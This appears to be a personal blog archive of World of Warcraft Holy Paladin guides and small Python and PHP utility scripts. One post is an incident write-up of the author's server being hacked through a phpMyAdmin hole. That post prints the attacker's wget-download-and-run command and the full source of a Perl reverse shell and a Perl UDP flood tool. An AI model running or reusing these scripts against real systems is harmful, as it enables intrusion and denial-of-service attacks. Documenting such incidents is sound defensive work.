I been wanting to look in the effectiveness of the 20% raid wall granted by Divine Guardian (4th tier talent in a Paladin’s protection tree). To do this I wrote a very simple Python program to read the combat log, detect with DG goes up and then record all the damage that was taken while it was present on a unit, and work out how much was mitigated. Of course, as the script was hacked up, it has all sorts of limitations:

• Ignores Divine Sacrifice
• Ignores any other mitigation effects (Talents / Sanc / Inspiration / etc)
• Ignores overkills
• Undefined behavior when used by two Paladins

Below is the results for a two nights in ICC 25, while I’m sure it’s not 100% it should be a reasonable ballpark figure.

Introduction to Holy Paladin Healing in 3.2 / 3.3

Spec

• Base Holy tree looks something like this talent tree
  • Points in Imp Wis and Bless Hands can be moved about if you’d prefer
• Then either go 17 points into Prot for Divine Guardian, or 20 points into Ret for Crit + Run Speed

Glyphs

• Glyph of Holy Light
• Glyph of Wisdom
• Glyph of Beacon of Light (My preference)

Addons

• Grid + Clique / Healbot / Fail Bindings + Blizzard frames. Just make sure you can see every-ones health, and debuffs (preferable with time + stacks)
• Paladin Beacon of Light, Sacred Shield Tracker
• Jaraxxus_DebuffHealingMonitor

Gear

• Int > *
• Use a Insightful Earthsiege Diamond Meta. Always
• Socket +20 Int in everything, use a single Nightmare Tear (+10 all stats) to activate the meta
• Haste is a great throughput stat, 500-650 is a nice area to aim for
• Don’t worry too much about your crit / mp5. Keep them balance, it will come naturally on your gear

Healing

• Assuming a non trivial fight (else do what ever the hell you want, it’s not important)
• Your job will be to keep the tanks up, and help out on the raid when safe
• Make sure you can see debuffs. If you use Grid either add the debuffs for each encounter yourself, or install a Grid addon that does it for you
• Pick the player that will take most damage during the fight, this will normally be the MT
  • Put Beacon on them. Keep it up. Don’t let it drop.
  • Beacon has a 60yard range, use this to your advantage (e.g. If phase 2 of beasts you can spread out more than other healers and still heal both tanks)
  • Note: With Multiple Paladins, if may be wise to split the Beacons depending on the fight. For example:
    • Beasts doesn’t matter, you’ll be healing the two tanks almost all the time (phase 1 + 2)
    • Jaraxxus split between OT and MT (the OT will take similar amounts of damage, that can be more spikey [Asmuing your interupters don’t suck])
    • Twins split, raid healing is very high compared to tank damage
• Keep JotP up. Always. It’s one GCD every 60s for 15% Haste.
  • Judge Light to pad meters, judge Wisdom to keep hunters from QQ’ing
  • Don’t wait till 5s before refreshing the buff, do it when the tank isn’t taking much damage and the raid is nice and high
  • Judge = Melee attack = Change of Seal of Wisdom proc
• If you’re Holy/Prot; keep SS up, like judgements, refresh early when it’s safe
• Spam HL on Target taking damage that you haven’t placed Beacon on (OT, or Raid members)
• Be Awesome

Dealing with Mana

• FoL isn’t useless, use it to save mana when you know the there is little damage (First 2-3 impales on beasts). Just don’t let anyone die.
• Time Divine Plea with natural breaks in the fight (phase change, or little damage) don’t leave it till you’re out of mana
• Use Divine Illumination early so you can use it several times during en encounter
• Abuse Seal of Wisdom when it’s safe. e.g.
  • Icehowl, after a stun (make sure you leave melee range before the stun wears off to avoid the knock back)
  • Jarraxus when no adds are up (you need to pay very close attention to what’s going on)
  • Twins, when there aren’t too many orbs about
  • Anub’Arak, on phase change whack the Scarabs and even Anub himself in between Holy Lights

Turns out our Mysql server at work is a little bigger than I thought:

Databases 75
Tables    1,549
Rows      1,018,085,348

However over the last couple of months, we’ve only averaged 130 queries/second

Hacked up PHP to gather stats:

<?php

class MysqlCounter
{
    public function __construct($host, $username, $password)
    {
        $this->conn = mysql_connect($host, $username, $password, true);

        if($this->conn === false)
        {
            throw new Exception("Unable to connect to Mysql server: " . mysql_error());
        }

        $this->num_databases = 0;
        $this->num_tables = 0;
        $this->num_rows = 0;
    }

    private function query($sql)
    {
        $query = mysql_query($sql, $this->conn);

        if($query === false)
        {
            throw new Exception("Unable to run query: $sql\n" . mysql_error($this->conn));
        }

        if($query === true)
        {
            return array();
        }

        $rows = array();

        while ($row = mysql_fetch_array($query))
        {
            $rows[] = $row;
        }

        return $rows;
    }

    public function gather_stats($callback = false)
    {
        foreach($this->query("SHOW DATABASES") as $row_database)
        {
            $this->num_databases++;

            $this->query("USE `{$row_database['Database']}`");

            foreach($this->query("SHOW TABLE STATUS") as $row_table)
            {
                $this->num_tables++;
                $this->num_rows += $row_table['Rows'];

                if($callback !== false)
                {
                    $args = array($row_database['Database'], $row_table['Name'], $row_table['Rows']);
                    call_user_func_array($callback, $args);
                }
            }
        }
    }

    public static function default_callback($database, $table, $rows)
    {
        printf("%s %s %d\n", $database, $table, $rows);
    }
}

$counter = new MysqlCounter('hostname', 'username', 'password');
$counter->gather_stats(array('MysqlCounter', 'default_callback'));

echo "Databases {$counter->num_databases}\n";
echo "Tables    {$counter->num_tables}\n";
echo "Rows      {$counter->num_rows}\n";

DesuToys

Something quick I whipped up last night, after noticing that after my log file was > 4GB the WorldOfLogs parser will no longer do real time logging.

Edit: Turns out that the WoW client itself stopped logging, even though the log file was a little over expected limit (4,334,806,196 bytes)

Note: The code is just a one off script; things are hard coded, and it’s pretty slow (100MB a minute)

#!/usr/bin/env python

import re
import datetime

GAP_SIZE_IN_SECONDS = 60 * 60

class CombatLog:
    def __init__(self, filename):
        self.filename = filename

    def process(self):
        last_timestamp = None
        line_count = 0
        split_log = None

        for line in open(self.filename):
            line_count += 1
            timestamp = self.parse_timestamp(line)

            if timestamp == None:
                print "Unparsable data on line %d" % (line_count,)
                print repr(line)
                print
                continue

            # To handle the first line
            if last_timestamp == None:
                last_timestamp = timestamp
                split_log = Appender(timestamp)
                print "Starting new file", split_log.filename

            difference = timestamp - last_timestamp

            if difference.seconds > GAP_SIZE_IN_SECONDS:
                # Close the old log file, and start a new one
                split_log.close()
                split_log = Appender(timestamp)

                print "Starting new file", split_log.filename


            split_log.append(line)
            last_timestamp = timestamp

            if line_count % 100000 == 0:
                print "Processed %d lines" % (line_count,)



    def parse_timestamp(self, line):
        # m/d hh:mm:ss.msec
        # 6/6 21:04:29.435
        regex = r"^(\d+)/(\d+) (\d+):(\d+):(\d+).(\d+) "

        matches = re.search(regex, line)

        if matches == None:
            return None

        timestamp = datetime.datetime(2009,
                                      int(matches.group(1)),
                                      int(matches.group(2)),
                                      int(matches.group(3)),
                                      int(matches.group(4)),
                                      int(matches.group(5)),
                                      int(matches.group(6))*1000);

        return timestamp


class Appender:
    def __init__(self, timestamp):
        self.filename = "WoWCombatLog_" + timestamp.strftime("%Y%m%d_%H%M%S") + ".txt"
        self.handle = open(self.filename, 'a')

    def append(self, line):
        self.handle.write(line)

    def close(self):
        self.handle.close()


splitter = CombatLog("../WoWCombatLog.20090904.txt")
splitter.process()

print "Done"

Comment from Cryoclasm on August 9th 2011

Here’s an improved version of the timestamp function that eliminates the hard-coded year 2009. It should work properly as long as the clock hasn’t been set back since the start of the last log (may be an issue for speed-kill runs when DST ends) and the oldest log entry is less than a year old.

def parse_timestamp(self, line):
# m/d hh:mm:ss.msec
# 6/6 21:04:29.435
regex = r”^(\d+)/(\d+) (\d+):(\d+):(\d+).(\d+) ”

matches = re.search(regex, line)

if matches == None:
return None

now = datetime.datetime.now()

timestamp = datetime.datetime(now.year,
int(matches.group(1)),
int(matches.group(2)),
int(matches.group(3)),
int(matches.group(4)),
int(matches.group(5)),
int(matches.group(6))*1000);

if timestamp > now: # this log is from last year
timestamp.year -= 1

return timestamp

Yep, I was hacked 5 days ago. Seems I’ve been part of some DOS attack (I forgot to record the IPs of who, and it was only ~60GB of traffic).

From what I can tell, it exploited an (old, now patched) hole in PHPMyAdmin that let you write PHP files with what ever content you wanted. CVE-2009-1151. An implementation of that attack is available from GNU Citizen

Of course after that, you’re able to do anything the web server can. The command that was run on my server was:

/admin/phpmyadmin/config/config.inc.php?c=cd%20/tmp;wget%20mixtheremix.ucoz.com/robot.txt;perl%20robot.txt;rm%20-rf%20robot.txt

ucoz.com is a free website service. I was also unable to recover robot.txt

The script appear to download and execute two scripts:

back.txt

#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);

udp.pl

#!/usr/bin/perl


use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit http://hacking.3xforum.ro/ \n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Amu Floodez $ip pe portu $port \n";
printf "daca nu pica in 10 min dai pe alt port \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

What I’ve learnt:

• Keep PHPMyAdmin up to date, because they suck at security (The whole idea of a PHP script being able to write a PHP script is stupid)
  • (Failing the last point) Don’t leave un-maintained PHP scripts in publicly accessible locations
  • Investigate in a way to disable system/eval in PHP (with a whitelist)

That Just Happened is a simple but very useful WoW addon that allows you announce (locally, or the party/raid) when certain events happen, like Guardian Spirit on someone, or when a Polymorph breaks.

Below are the rules I currently use:

event;source;target;spellname;affiliation;channel;spam
SPELL_AURA_APPLIED;;;Hand of Salvation;;RAID;Hand of Salvation on *target (*source)
SPELL_AURA_APPLIED;;;Hand of Sacrifice;;RW;Hand of Sacrifice on *target (*source)
SPELL_AURA_APPLIED;;;Guardian Spirit;;RW;Guardian Spirit on *target (*source)
SPELL_AURA_APPLIED;;;Shield Wall;;RW;Shield Wall on *source
SPELL_AURA_APPLIED;;;Divine Protection;;RW;Divine Protection on *source
SPELL_INTERRUPT;;;;;RAID;*source interrupted *target
SPELL_AURA_APPLIED;;;Pain Suppression;;RW;Pain Suppression on *target (*source)
SPELL_CAST_SUCCESS;;;Divine Sacrifice;;RW;Divine Sacrifice (*source)
SPELL_AURA_APPLIED;Soran;;Holy Mending;;SELF;
SPELL_AURA_APPLIED;;;Hand of Protection;;RW;Hand of Protection on *target (*source)

(We’ve not had a DK tank for a long time, so no CDs listed for them)

Maintankadin has a great overview with many more examples

Holy Paladin changes in 3.2 seem pretty significant, I’m currently hoping the FoL/HoT mechanic works a little like ignite, where in effect you have n number of buffs up on the target, and WoW just consolidates them into one (As oppose to old ignite rolling, where each time the debuff was added, the damage was added to the previous debuff and the time reset, resulting in massive damage with lots of luck).

I’m 95% sure the FoL SS HoT won’t work like this, but I wanted to test how it would work at current gear levels.

The above table is 12 seconds of FoL spam on a target with SS. It uses an average FoL heal amount of 5,000 every 1.5s (yes, yes). After 12 seconds, the HoT is full and provides 1,667 healing ever 0.5 seconds. Which is pretty absurd

Honestly I like our niche as tank healers, and I feel the changes in 3.2 will not do much for raid healing and with regen nerfs, our tank healing will suffer too, leaving us without a niche.

My preference would be to keep beacon as it is in 3.1 (for topping up OTs), take the regen nerfs and have a FoL (like above) that’s useful for Tank Healing. We still wont be able raid heal, but we’ll have a rotation, have to worry about mana, and we’ll keep our niche.

Edit GC has confirmed that it will not stack or roll in any way. At the moment it can also be overwritten too, so FoL spam = no HoT ticks.

After much more fun with General Vezax on 25 this week, I thought I would make a small note about the spec I swapped to for this fight.

The basic spec is 28/43/0 which gives up most of our normal healing tools (no shock, no beacon, no bonus crit from the Retribution tree, etc) for Touched by the Light.

With Touched by the Light, my FoL hits for 6000 and crits for 11,000, which drastically changes the way you can heal. Rather than having to stop casting expensive Holy Lights, you’re able to use FoL almost exclusively and it’s no big deal to over heal a bit.

Update (20090622)

Vezax has finally been killed (WoL). The FoL build does seem pretty good, mana was fine until towards the end, but I object to absorb guessing code not assigning any procs to me :-)